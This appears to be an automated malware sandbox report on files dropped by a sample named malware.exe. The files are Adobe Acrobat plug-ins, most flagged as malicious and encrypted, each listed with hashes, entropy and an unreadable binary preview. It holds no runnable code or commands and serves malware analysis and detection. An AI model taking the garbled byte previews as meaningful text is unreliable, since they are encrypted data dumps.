                        SSDEEP:24576:v2SesjjiyQNbJezjCeeWboaRpzmdKCUvtCigfdmv1D8DBKz6j+h5d/7qCzVei7/A:+Se/0jBeclY2vtCigfdM1DmKzMMVf7LM
                        MD5:57B398D4E578F387247602B17FFED384
                        SHA1:964E36FDE976E50652381C7D50B21F68BF96B0C5
                        SHA-256:17DABA920581E3F14DF76EE213D0638FB9A18512E59915386352C316FBF5988A
                        SHA-512:CADFC2C60266927A5043E7BA5047FE5BEE05FAC4F62003168A6052262F4219169A7E16D277630AF97A221E40BEF668BB84E8720919C419830084B48AB8CB143F
                        Malicious:false
                        Preview:....._...n..3D...-..;.#..0k..b{T..Q....?$~..P..$?L.\...fw.G.}....L...S:.+..!...^..7...BS....|6..[..4b.4.?.........x...Lm.4.~f...@clX.]..LP.M.[.c...u.L.(4C.y....&..bB.a..Y.TC..p..|R./>......B[.Y.g.|...D.v...5...@.$..".? >..e..F...)..S..,.D.......b..]8...Br.......Z..t.xS..?.._..yXbN.v....y.Oa;..z..h._4.......Z...c%.Qu......se.f.6.....o...+].K..9.a[tr.G..."..(1$..@..c......x.`..........'.}...J.~3A.U..F....&......d..o.....%...po.O.?.y.,.qm.V...;.E.M..........U.......b.K.....,#...Z8..\**.c.2.'..gz..u.N.$?..|Q.zaI.Y....Al.....OFG.'..........73.....eZ.X.......Z.iuoo'....6<.d....x.,(..)@m..D.n.!.u......S^.3Yl..H-.s%|u.,.....Z.....e.....T&.N^........T.].W..e.e..M..`.4B..4q}.c)".l..OlG....j...U..X...6<3rMY...y`.X.a...z..p<7!u.P.e......l......e..eV......a..z..*....da...Z....Lu...Y?..1;.q..z..j...I.3...u9.4...Z....z0....b...7$r!.h....3T.E......$.....W.....9.p..a."yn42^e..7%.V$.....rP..e....zA....6.......z.{#.....!P.g..j..+l.sJ.r.F.ktr...].8r.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\Flash.mpp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):154220
                        Entropy (8bit):7.990823262785764
                        Encrypted:true
                        SSDEEP:3072:DemXcTwU4U9qv//NJLLzPsO3+eSmPGx6WzpTSSX18tE/+r7PGR/y2Qopl:qicR4O+/X3z/ueSfx6C8tEibwy6T
                        MD5:7B170F6A75B849354AF4FD395C4061A0
                        SHA1:A1D539E555B3F9DF13075DFEB5147A1E1047872D
                        SHA-256:E82D74E5A5881A133FCD5E65B152631315B16537FAD5E1C5EB1CF73117C331F9
                        SHA-512:9914B35FBE173FF4D17EE783BBD5ECB5BD35CFFF519B93CCE4071C4B722AC4494D840858660D59ACE7355E6E796BB1A269093CBC0807F056407F51DAF8B66076
                        Malicious:true
                        Preview:H...e.y....r..AkD.M.8%.A.O:.n....^..<....J_..aQ...7R_@.a.(?..H.2.e.{I9....:.h.q.] .e1....M.KP...,n.,i...K..F.55....% ..].b....gjY....K....^L..8&....fu\E.fB..\t..n..HM.3.?...)h.NUi....hh......!..>../@...qf....r.].6..1..c..../^Fh..Q....;..?.......e.8.NvMI.K...,r. ......f...mP;..!.."v.3Q..."B...;...\'...:.....v$....3..]....b..u.........O...w2O.......;......O.t..i.h.9..H..h..17.....j.l.....p.f...N..O...a.....m.U......."..W..7...rZ.K..G.].6.....IKe#.l.J4..7.jz..t..).C~7.P...Y(~...-.y{.."jf.2.3.H....CBT$;...N.....;.%4.{..f[...,...o).R.Z...<....2'......,@.Xv,Z.t...(.}.SK.;.r7... ...W.V.o[...{./.NU1..8#9....0N$.E.....4....:.d..W....S..Q"id........5v.!?+y3......S.SY)S.......`.vaX.<.....&.P...dY.G.G....V.G..(.s.?.h.,..-(.\......1.......f>...\.)...q{.lm..e.T~..l..,.3...4.....P.M.....z......H5-.;.s.....x..#g.).Z...w.".2.e...A.....}]<..O..2....}...R....CV.?.F..tp6.f..}...{...B.....<.@.p;.o.^(....iQ9.s;.[........ Lj..u...F ....^..BS./..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\MCIMPP.mpp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):137836
                        Entropy (8bit):7.9785622318720115
                        Encrypted:false
                        SSDEEP:1536:egm//y7jWWx9yz0NJdbh+9jU91T5csG+kmBvNgJIjfAYqqw1BmNOXCVlURpxyDCx:R2G9yz0Pz1NcDT0+GeqwPHJ
                        MD5:A9E608DAE3CFB6BC7F2D1594504A5EC9
                        SHA1:95AB1F0A56DCCE8D98CDEB57687DC3CEF9F5D804
                        SHA-256:A5A0B0BC0CB1899620270D9D75786F822DEC03DBA3DD4E73C5739F1EEC936555
                        SHA-512:2891545B382423B2ACA517F3EF44125D0D6B5F6E2BBB0218111ECA28229F2D2A7D88BCFE6CF7C8CD6DA31B936023CA165F4C41AAF9F298EB494CDA5BA914715E
                        Malicious:false
                        Preview:.2....uMWo@. ..(X.F.e..Uy..E...4...8F..m.........uww}b'..P...t...@&.... .IH.{?..,~.3Je..wZ.$1F.L.o.....c.zv.>{..E.0.TF....[..UKH.A....f...Z...Db.P].YIl....h...m.m......\..y...E..M..).<.%.+..=@.......h....&.Z...k....7..V.X.)9.quo.9d.@.L`.+...(o...K.B!....1.X.1O..:X.79....T+o....4.4.0k.."....B!...,.....9f.....cK..v`x.P.5.]bl._..f4.fh....<.j.{S.....?I].CK...g.... ....*0$.n.......a.W(....`>}-...B<......6.....U..........F."/....e...m..<N5....'.pG.x.I.8..k.m.z.$........gok_.]JJ;.:{..j#..b...p.,u`.|...c.Q...6..b.7.o&.;8#..i.&.Hc.I.;ZE.3.$....fU.F&.l?k....._8f...P.|b~..1..t......x...O.W...F4.........\:.#.........'z$03..).....p.$.x8.<sx0..@O.....2....G#3I.V+...,.)A.....HV....g.8..6.-...u..w[H....gOaBF...3.!...0.....|T...h...j.Mi".*v.$.....1.L?..A........._...7.m....h...W.3...}...".....i~{..."..f./.s5.s.......R..3.H.R3M~..........{t.^...th..I.QxJdq.!.K.8..Rg..{./T....6..d.7..^.^...m_.~I....M..sgAvf1..8.[z...F7D......'.d....?...1.....@.F.....\

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\WindowsMedia.mpp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):215148
                        Entropy (8bit):7.990674111572351
                        Encrypted:true
                        SSDEEP:3072:cy0+QPxeDCC+bB2KZ0yUTaceYZKTTYVBxCnXsqnJHd8nwi88JzdQznB:cy0fPxMCC+bB1OFNQTYVBAnx9
                        MD5:40F7A36D0BB7B039AB2BEF981D6E68C9
                        SHA1:507F9FA25515E71F8C80048959EB5685A718CB00
                        SHA-256:4FD36049D76B413C2C6B62D2D0B24E954DDDE275A21F64D01422AAF268DA5FEA
                        SHA-512:E94D31A3CA8C574FA40208515A1D099C6B53026F3B0823C21D4907D4DEF30D6D8860102C620201BFECF4BC193F0E2CF5DD3C422E19BB6957D10786D07D78A028
                        Malicious:true
                        Preview:bd....k..{v...d...Az\X..{jHK....'.V..sB..K*.{....&.PQl......{.S..........*$...9.`..pIwW...Bt....s....\5y.A..~...QSe[..k..r..EN.3.~..+..Z..-*Dz.1...F.lN..s...-.R.....S.........@.....S.....07...3..,.g.........rmh..^q0f?..<..Tw...;."..tS=K.&...."...+..8...$u.YA..{q.G9=.M..{.q..T...rY.b.ze..G$........T=S..d..?.m&......~..{..."..T...._.%..........?.,.$...iq@=g....3...G?....RD].....Z..j...)b.....]k'.m(g%.....P....P....>f.,.L`....!.'/-o.`b>TQ..pM9.s. K.:d.^...).Zo.B.x..=Ij.:F3...2.V....P{._.4.O....m....P*..6. ......l.m..$.O.8.Y..b....Q....d.2......,..z...v..*...aH.3)..!9.2D....).k..r.....-.A..Z...~+...b*.Z....F..-<....|L..h.y....a.U..+Uia.....a9.DGXa.+..9.:.v...P.I[........nUM{..r=CAX.....>.$#LS......e.3.C...m)].azc..2..w.J.u..oT.%....U)_mzN..%\.AB..N....=.jhvQ.P...*...T.~...6.....7./..a..)...?H.........v3...L.[.O.\9..1z..]n..w!A..^l........Et....%....F......l..%....;.3J.[...e.Z=..7..p...h..A..ZL..S...._.*.z..7|..4z..........2g.Fm...sN#.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\PDDom.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):506948
                        Entropy (8bit):7.997051643105298
                        Encrypted:true
                        SSDEEP:6144:4BJm+bQ4Fc4B9e9uHOs9OmMmZB2lO//lEcSRv35w5sWjC6kqUNLIhvrKQ8fAJ/pN:4Bze4sg9RgLcGvA1QeFSAtpmyZBAB+
                        MD5:A7AD48C4DAF0D7BDA34880F37387C2D3
                        SHA1:1E96ED72EDCD1CA37DEF3E1466E94149D3072511
                        SHA-256:3C12965AF6651D5FB3676AF91F049560FD619B5860F716ADF49F868B88117468
                        SHA-512:38D53D4A882D9C40DFCB53D3661EC11C9BD957A794B5A17A55A0BEEC828285D38363A74B02DF3152765C725E10B6ED0A106E20D35A8A918FA2D70A1614EBC0AF
                        Malicious:true
                        Preview:..>.bw..|L....AG4jJ5..y..n)x.y*.r...d.O).....kk8..!z$v+.....o.o:L^....3............>...Y.....u}..@s...bG~Bx?v....... ._\9.....do.u-....z...W.;.-}1%n..D..... /.|....".u:..^.Cr.K5i0`...W8..aWbH.r..G..ox.....Xw.4.uA.OI...>....._.m.Z..W..P...ir3....gH.`.'.......OP.. ./..V...P7~h....vE.A,.4..*.S...]..........z.Y...J..5........,n......$G.Q..S>.{....:e..P{..G........Y.....4 .....\....H......U.j...PJ.._.J..xq..a...(/.b..NU5.......T..w.>.y.SV.....J....k`...EL..\...P7.=.t........}{...........+....z..x..N.z.Z..?L.......s.%......v....N*k..uF+i.k.....I0Yq.....|...I..f6.............`..u..-..6a...%..1......mF.....=..t..jj.......'Z.mL.1t.=-....(.....k...(..U-.L.A.S..$RG.....!......../...vAS...i:..UZ..I|P..A.A..m..hn`....g...@.7.5$w...5,6..Q.."..~z..+.8...b0.M...]...Di....j...9s.....+....m....\.ZC.......t......88l.~rG.[..V....V.0.|.1F.*.]..V2.@.t......o.Jy....I...V.....L.;...<i....q....E..w....i..H.....pV.z..NfH.....x...!....&i.X.;.-....U|{..yA.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\PPKLite.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:OpenPGP Public Key
                        Category:dropped
                        Size (bytes):10830916
                        Entropy (8bit):7.3318614275354
                        Encrypted:false
                        SSDEEP:98304:IUlhnyuwSYRcw+apy5iIw9YCvKr2mnOwtsH1SRn6skkO4BWbPd7p:IUl1VwpRc4QPLCvKSH0R6v4BiVp
                        MD5:BFE741EED86F87E205AFE697D6E16B7E
                        SHA1:D5A22F706F359FA37729F7D3C09074C189BBC5FF
                        SHA-256:E788C37F00106197600E15A997565CCFF0775F4EEEC9264FC46403C22F33198F
                        SHA-512:A9F23537DE890B604A7A43C422B48D3649E3127A9381FA1ECF2E23A94B82A6513AFD071E632B31E5126B260E506561A5F41468C8E1F33D48E118217670539310
                        Malicious:false
                        Preview:..^.STzQ...x..`...#...?...N...?J........M...p......q..o.IB........(..{..Mq2fg.y.!.a...t`...#.L%..~..flG..]#.n>..x.......E.f..fG..<.......j...C.FN........!.+r......T"9p[..d..6....GW..:h!*B.R....@.e)[.P(.FLE1..i...M....+..#...5h..uv.T..avt...v.?.W...j......k./$:........b...".....U....@.`-.x..w.......,...;B..v.~..@e.8...4..@.j({-:M.R..i.d.wk.n.'f....nY.*..8:.....U.k...F.M.NI.C..qr.`......G.....D.$^68..\.-.`..=.ga...5...9.....{....:(../S......4.}<....c..s...;~`...:..B._p.......K..O..l..%.[oms....R.b5h.2..Rw6._l..p.0>z.!..l.C..xcJ.W.?..qA1^v0"...p.T$..\..X.?.<..fvg.a.d!....8..Px...J..=qSh4.(.'....&f...$.<r..Ep....r5.......b.g.p4......5.eyu..<....z.H...M<h.3d.\4.n...Q..i...gB..z5....."1..4.....K.s......Q.$....x.u..!......q..M..]..6......Z...^./....#.kV.d.5.W....Q...'.y.S[..<.a....)>...{.{..T]...;.U.Gri=:...6.]C..n..V..8m].....T..xy...H..y2..jv.a.../wqd..!.E.R..k.W...}....=>.&...q..]a......'.....=l.Sc...]...m..$)._G..v.Z.^ .......|..^<.A...*..<.h;.[....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\ReadOutLoud.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):158788
                        Entropy (8bit):7.994498918951214
                        Encrypted:true
                        SSDEEP:3072:GVmwcVGtctzwokNNUQCCg6hHGvaVR4Kh2PNXAmkF9KHvAUUw74z4kO:MdcVOfvAEm+vhWNXRk7KHvAUUTzg
                        MD5:65AEDE7535621612ECD0621C741080C3
                        SHA1:7563D72EF6DD7CC312065DB7C2E55727F0DC2973
                        SHA-256:6A82C7C66F87516602BABFEBF709AF842353BB9111CDDA3B76D530BAE51C4F10
                        SHA-512:D76B5199C3968739B6C7D5736E869E16D268A698FB9834EA79428C72E3ED29102A628F056333613189CD3030A0722393613329F3B8F94EE8B72D7F71C5DEA4A9
                        Malicious:true
                        Preview:...p.6...*h...w...A........|XQ...q.vb...._....M.vC..u.k..\.f.:.1.C.R9.I:o.,:..d..-<.=|..mZ.q..`.<K........C..:z......#..J.....w....d...oj..d.*{.`..F9q.p.dH...#.U*.4...paY..Z.scP=....H.*.3j..4..^;..<%.L#.........].n2s.ya<4-.i.9....f...)...jJM]..A8..../.%4..SZ$C.."Q..._......{.hF[...5.<....i>..~O...........T.-2K.J...f..}...^..+[P.$..dE...7V#Xd....H.A.d..De.....<.h<..JL..;.W'm.d.>O..]..t..1.a#.\Z...=.ax.<+T....._.C.c9..XsY...$.o4.....m..!.]$W.{.3..1p2U.=...3...t&.T.b..3.}..h.\ ..G(a..M..14.x..2^.s.w........A....Q.........b.<X2..".%l<....f....8svs..W5;J.u...u..aF. NJO.U.f.J..ZN$..eE.?..m.47..`3....`K...p..h.V.N..V.@/..~.z.. z..M...N...d.......K.N.q15o.......E/..$.E...p.b^.i..!..+.b...........H.2.l.(..........d.>a}.4.yZ..*......f..rq..B..n...p.7.a......=...b........!V.Y....<.V..o..L.tJ..D...(F..9.D....7 .X+.W..~.......#{P'.^..n....%."j2..Hwc..}l.p......,..@...$...$...u.J..#......i.y....... ..*....N.'-.h=P.........=....0.As..<;........#...V5t...F...)#

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\SaveAsRTF.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):539716
                        Entropy (8bit):7.99789760008474
                        Encrypted:true
                        SSDEEP:12288:/hG5AflWHGghUGgnpXHNj07h01IgYQzROy+4hIjkv6Own0s:/MAcHGaSp801fYOJ+4hvZ+0s
                        MD5:B12B8A796ADEF58966256F6F8CF610E3
                        SHA1:4D106A94167867DB37AD3CCA426964A79A519F1F
                        SHA-256:469BC197B8E6DB62CFF1DBC17F778F040602026BBE1AE0524AA24E3C5C7BEBE1
                        SHA-512:CBD51711791FF9DB18A4E5FD1843350D70A963D6CA073DFCC56D62F8B30F606E7CA537E53A32079DD6AFC14614F95F45231BAC8A2A7A9F113E5E26BF4FC64908
                        Malicious:true
                        Preview:... ..XN...s...W...t....._~N.s...k.V..6..6\....:3....k<...<...v..<&i...:.&~........ 67c..g.#...Z..-..'n6...r..OzA6NT1z^z...7I+.e...r.r.G/.........K!N..r.wp....=.v$.W..-..L.U.$.IJ.W..}....W..'~...0.h.....$)..0.(.d...z.*...+.).....L..GU..wY.d...a9..........P...rJ..]2\./.0Q..^..._..8.#1......fY..!.a..1.]>.5n...=;).b..jC...;...'?.D.....;...ji..Dlr)..h}......}.=6.rk.7Q...-.~w..T..jnm5.T..vz.....1.#. .......(.L..c.\!.......N.d._c..K.^.%M.VE...D...)}>..K.4.....lt.n...Z.-...U.............0n....h.z.G...+.%e...........h...mW.l.K.e.C........ Wf...9t{~....T...............5..<H......t........./qA1......a..n......^o5.mI....E.A...../.t$.T...3W5g..6..%.E.\...I...........Z.......c....T.<..uD..tg..S.3,...S..iA..}.t.k.k.........;..q.G..7(....7.....|pO....Wx..y.=P.q.I.sf......'.c.....9.!m.....,0o..|..`.$Im).@..........+...I.YZ$q....*{_.Qc..0"..dL....h..tc..0J..m.o..$qa....W...T...xA..*TX..h.V....|.t...0xa.r..T.=.). .`....*..<.$..$H....w.......V...#9.:}.^.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Search.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):575556
                        Entropy (8bit):7.99734493672756
                        Encrypted:true
                        SSDEEP:12288:Jss6/YWGzfEtmABIuBDhEpn2ZFgcDfSzz5xpx3:JGAnDEtDyOtEn2rgcDfSzHp5
                        MD5:1A4352389D6F5B5B65EBB7D9546235CF
                        SHA1:40A7A50B10DE08B04E72587C0055F89922E758FC
                        SHA-256:BF28BDE41C93235455D819527D8B2ABDEA85145F5201D5BC0037096A290D44E7
                        SHA-512:56953A4EDBFAEFCF262376F4547FC60AB33D94F83EACCB528ECB01993EEEB35BFBC84C0773405F16E353F88F76A9D0480678E421205E4618FEA2FF6D4CEC309E
                        Malicious:true
                        Preview:...X|9.0.s..5S.B....T.S...9_..J...*G.C7.Eh.J.8).#....B....LC....F.....Tj0....Wo.4....B....8.....Zz..m.........lU.V...^..pi^.R...ZMmtdv.HqQ......S{.4...G.*..,.:m.Z2.....I..B.].f..............:'Wj.....9.R.4..14....../.^.w....?..S T....,.l.....Q....[Z....f.0..J.UDc5.........cB6.'#8...v.Bf....../$iS:(..9...As..n../...f..K.]....W..1......qN:...q..(p....#/.......}.5.z3..6Z;.<.^{..........a.iO...A.....x...b..E.K.....xd....D.....v...Z.......d.|.x..A .Q...1?}|.NT..fq.4d<..b.~.^.H'...0.......[..Y.XA.....x....C............k4....}`PV....>..._..[.=.=.....~..l....+.AU.Xbu..A..v.\.V...t$.ww..5h..ni..J@24f..3.=.a.J.]\.......(....C.i..6........\.G.H.S...i......!..m.].S.X..`'...Lj:.f...puQJ.I..j.....L.xU...S..M4~.u....Pl..MNB....;)9... ]4v..\...#h...8...0..Xr....F.9Q@..I.K...F.u...l+$5.[....\oc./.K...Y.J}..Ko..w...E......3.>n..K.w...<K,.0...r....Q..,........bb.^......q...w.G....`....ZA..$.E..6.._....L.vw_..P..w6..O..<..|. A......F.vJ..Pn<.;...:,..2....cc.)[/...C.Z....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\SendMail.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):573508
                        Entropy (8bit):7.998307773580034
                        Encrypted:true
                        SSDEEP:12288:R1f7z5UOol0G1CyyjUOZTydRyR6pErSfXRv26pVy7afSSd2QjDJ1Sz:RR3540vyytMaRvefXA6pA734jDJ1Sz
                        MD5:0333A85B4D55ED1F47C8DB570A28BC44
                        SHA1:47D6569B77E755F4B39A67999832C844A690D04E
                        SHA-256:FEE1A571D99F144748D2350311994F3189A54F7B8409125895C523046267468B
                        SHA-512:77E3AB2A378F83577C8C5621488CAD30567D6F13055798B15CDDABF4A9754D0203E9D1C4D564EEB6F1E15646BCC89A4AC8E7BA5A4A9C3637267C152B84016644
                        Malicious:true
                        Preview:.......H.....d...I..i.....v..~../U..W.D...ia:......#..i....d.5....!\}.....{..%.]..}!..=X.)...e.S..l.f.V.K...4..="Zb.Sw.t&.....S..K.X...k...^B..3;@..]..M...&6I;aA.}x..M.....O.!.......5.>$..r7....r..g...rY....ab....L*:}.~.._z".);s.O.H..H.....(.o.^.e....{j.kg<w.N....U<...r.....n.[N.zJ....sc....-\WC45.!.1..D........./.J.......A,..[8CE.G*.>+F..B.$.r.tZ.Qj..HRU..6X..N....z..UyU..M$.+..y1..W....&.#....5..|...S...BW...}.]......fQ...k...6..-E.....[...j.Pg.3 M?~^S$,.5.)...$.,&$D[.W...r...9..d._....0q........p.f#.|.t.4P..h.~A.^.R@.....:.W.t8.H}.7...W..L.;@.....pF.F........w'GM...z:...(.68.J. .....A..4}*.|z..."0..g........;...3-.....2Fb.R.u..Q.Y..|.9s(..N:V<v.....u....)..#."...f.......js...-....X...p..yY.....8.WYh.......ue.Kz`...iz.C.3....>..}.p.KFc......p..........y....^....^.E....i..@1.f....Z.s.<m..y2..T...6.s./._I".....F..c1mo5...V...$..&..v.........H..'a.D..V.+?}.>....].7ZAT..oa ...@......p....u+..[..06.nw......4....N).,.2.....J.o......nq

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Spelling.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):400964
                        Entropy (8bit):7.997954189230064
                        Encrypted:true
                        SSDEEP:6144:MnHbNTOxCeJdg0awlSPd2f/ri5peMl/oSiraIDmCAakmvhl+N5YgiCmiEP:UHpSoKlAI8peWoSuZAseYlUEP
                        MD5:7B3E22DBF78685AB15E791099EF4CFF6
                        SHA1:B6E81CE80F02EAEA19E87D5CC6618C2583E4D85A
                        SHA-256:ABC6262F697E5BF0C566332283B2EBBAC4DAC987A058F23CB80AA32BA114A458
                        SHA-512:988C963E2F247C6A9767B24D10DAFE6B0B5EDBAA4641DD4D4CF262C5FE5DBEB725B406C13FD23FEE53CE31743DB9E22AE0BC4C1200CBADEAFB6EA767CCD9FC73
                        Malicious:true
                        Preview:.}.gF.%d.S.O52.N8..#.H...w...%N.zm...f.......]....j.w..v..Ay ..'.P..5.d.....Z&...gU.(6RH@...s..4.l.....K..?Zd.-..........9.M....0F~[.l.".Pn........ac.).:....Z.....$z.9.*.$S..(.m.b.Ko.....EW..q.`.*.~..6.c.......s.H..t.Q.....C..;..q..N.s.J..!..p.T}.T...s.NH.xy|.o.b..H\../.S.@....z2)..B.t....qzo.mn...g.....j..V5|[JIZ.g.^.d..........=%}u..SBg{...@....5E.P+Gl...r.3..<r..+)i..0~uy.$........UF.@...o...w....O[........"o.F...._..R..."...y...;......Z.......r..K{..q..v&...EE..=........2.'...e=f.~.N5.g.....%...a.Di....>.i...Z!..i.......t.(N.9..II.{e...~...3.<..N...[~.XpR..g.........m@.'.d..]O7....`..pb........7x.u..{K.|......zp.....~Z5KE...R_0........<....".i.WN..+^...l.q.T...!.2.Y.R..fFw....:j. :Z...........8P}5%..o).{.............r@.O..!0.;..S2.P.....6.$..:.e*...>..c.p.....>].%. &........R{TL.E.K..<.)?S..!...tW...R..Tz.C...|...V..|.11|w...wa!.0e6.\.7f.%Hh...i.gHh..(....;...Eo=....K]%.@.....D..B,. .sI....&GwF.uiy.Lr|./!%.W&^.l6%.V.,s\N..L

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\StorageConnectors.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):653380
                        Entropy (8bit):7.997943667048087
                        Encrypted:true
                        SSDEEP:12288:eAry773DTsX7sY/buBEhXdAeJsCbdzXfYsYOjtH6eLosnctauNPvCrnk:emy77PI7sXcXdANUFft6eLoWc7NPvj
                        MD5:390C6F891668D510F6991E588CB40B5F
                        SHA1:46E01DB6EC0493EBAC984F96060CAB44C60403D4
                        SHA-256:7698028FB4F38F3CF5BA4CFC602CD51F68FAB6028AFBA445F4F96E468FA167C4
                        SHA-512:A24F39668CA93E4FFF17161A9B6ADE51C05E64868148FE671BAD124857767828FA321500938938E346C19A9F0475BA47329398BE37D5A14F10A081FC1924BAEB
                        Malicious:true
                        Preview:....J%+.K.n0|u.Si..1._..y..]....U....b..F.Y'.h...T...R....z.A.....I0.....QNc:-G.7k...........8.4<....f....Ji.Q2=e..G..4.W..>...v..s.|C.p.db..h........}......U.anM..U.X...f......e..onT.}/..m>.u5kr..9..c......&v2.V9A.$N...Mm...p...A.l..==.UK...2....$...Vo.....U...L. @.rz+.P.....Q%.HR{..R,l....2Y..w....)..d.$.lL ....H....E..=.x....D.......J.L.Q.......j...8..".J...7...`....|....n^.w....<..z..O....I.2.-.r...bG..`....x../.d..Vkf3)].B...@~.%.......e.&T.P..J./.A...NpeR;..$.'0.w.#.....)..99..I....BkBp/,n.x...%...e.|P..c...u.....i.n+....P.....{2....as.....,.P.e;+-.`...b.n....F..i..%.5".......0(......B.z...xZl.. ....O.;....Mh.g.g....5.$...2.!BIX:9....J..1i3.-.>...C...^..P .w...>...E5..G..F....q5.q..F....5..d.&k....hTxr..l..n<v..@......1.(..d.....E0..-E.h:....Q.d..../<5.U...m....).?..H....A.:..t.`S.=n...../...... ..N#Q......T.*..n........`...W?k..R...t..q...@.......;8..6.!.Is5..,.l.-..A"........1....l.c..>.J.....j..}Z53n/l.|4zN...'b...9....5...!@

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Updater.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):186940
                        Entropy (8bit):7.9960387878432755
                        Encrypted:true
                        SSDEEP:3072:KGxbF2DlWyT0lZ5apTwO3kRRa5tewhzwWGJoBJb1qa3WV8EnGsD3ovwGGSYsAzQf:8Dl9tTbPDeVibsgWV8JlvwnP7QoMl
                        MD5:A9627DD6A3C5D0DE907863E42BFDEDC0
                        SHA1:875D135DB5C2FB35C959A9B9AC8486B77C5441F0
                        SHA-256:A726E3E7033893359538EBAA3A92F100D1E83FF3B25D71CC0655654E08C726DB
                        SHA-512:FBE4BF08A7BD22986D7BFF0E4D97B46B9C695101A4FB39ADEF2F14EF376059270D8751341B4BAB35743CDDB095D8EB6CF73A73D814139D0FD9A2469EE8D273DD
                        Malicious:true
                        Preview:;r...e?.5$.hM.$....?,R..}CB.c..O..;.%5W.].Q'.=.?""-.D..F.NzrH....#.|.Dq.S..I.....x,...^LJ.2..2j..].......O....*..N.....R......:.\?..}....:[.L..Id)..$...4..}..I....)...o6?A6.'...7.c..nE.....p>/./y..l...z.5.....~.....4...C.t...D%....C(5.7Z.T.....2u.EF.X...(....Cj..77......3~...D..X.....=.N.:3)..e......1r.b5K..#..)*.....J........>....?....WJ....V>:.uh7..A.=.L.B.N<5......4..c..G.}A....?.A\"..h.F.cu^h.i.g...J..T#%0_q..P.c......r.......q...i:.......7.%....h.J[aR{.......c.......#.......6....3...^'..d..<.c`.k.@.VOl.........D.w.:...<.R6..~j."U>.........u/~....P....i+.i.Q.Z>.V.).C...q,...|......-...>JP..$.......xY....xDxR..'... ...s.#..d....w.n.....*..@....C...\...........+.8!..H../.....D.....n....U.K..3.7..&._j....s......9..i...z..7H..4..s.%..y..a.e..p.W..%.o.3..l....&..[.6...@d.O.NX...%....%ph..aC..Z.y..P.Y.y..../.b._w..X/..1S...}#._..1./c.Z.........F.....H...:..2a."2...."Y ......9^.Z.....Zc.R.?.....-,Z.X..>a... ...&..OQ.......q.ly..%Y.=..h...).5....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\eBook.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65084
                        Entropy (8bit):7.9974251850941105
                        Encrypted:true
                        SSDEEP:1536:8RFzbHQ6cCyxrrJBRG9EObNLp6bOtDEKInUdm/DH8:8c6cjrJWyOq6DEKuprH8
                        MD5:961702B6163426A7BFF4F572A4BA6383
                        SHA1:17421A1CC2BBBE157485C103D8D399FDBF3AE1B4
                        SHA-256:B08135A7F88A627C9EB9220A3793AFB954A272C33953CEFF5A4E0DD462C96E5C
                        SHA-512:5558C1A2BF5C031588DCD0EDE9806C2A4C65BC911E190F8A9941CC5946141FAB376DFBB2A1E968B868B1C9CB79102EA680BAC3ADB0F2DBC339DDC1944E2509E8
                        Malicious:true
                        Preview:.y!..N.$].......[O@.r0....T&-.79..).....y...u.t..~........s2.....,..E/..?...n......H..8.....X......=...Y/.5.F.M...Z~...@..X&...4..j....l.Ub..M.....B.jE.#({..w..{..|f.....a.e.O-EU.ff.......S[..7R..N.......G..C...6sd..)....S.@8H.....A.L3m....w..o..x^..5.(..0r.L....'].-.......w./..V....kK4.......9...&8%.Lh4...W.-fk..1.U...4.c}OE.?.hvg.."..U.0....iU.;........;..P$f.11]s...O..Dux.$K9,..h.-..v....6P.x..X......O*.v...+FAV...q....K....-.&...DK.I.[.Zm...%..;/........8...H...0.4.b..lE..o.:Qq...j.........?cH.0...X....(.Gl..D....1G.kI?.kJ$b.Vg.].]...'.....1.di .<..p......7?.....0.J..^D.O.....J/..fQ.....8..M.}Y.97.p....QAX.e...r.b........74.D. .O(.c\....).^-.....V...VQ..a]... Na.e..x.M...B....6...#......} ..K...].@...-...2=c!.C...f...b.....@...v..7]..|..?{.([.h.(u>p.n\K.d.(./'.....Bx.....L.z..(D.....,1zj..5...2Zd.....`.qy..2...aK.9.bqC..u..........p..'~O._.......R..Tz.f.....`.....D.^a.G....q1t.....).].?..:..~.W.."&..}...;^...I;.(G...B...oVLhX.Q........3

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\reflow.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):450628
                        Entropy (8bit):7.995414041403627
                        Encrypted:true
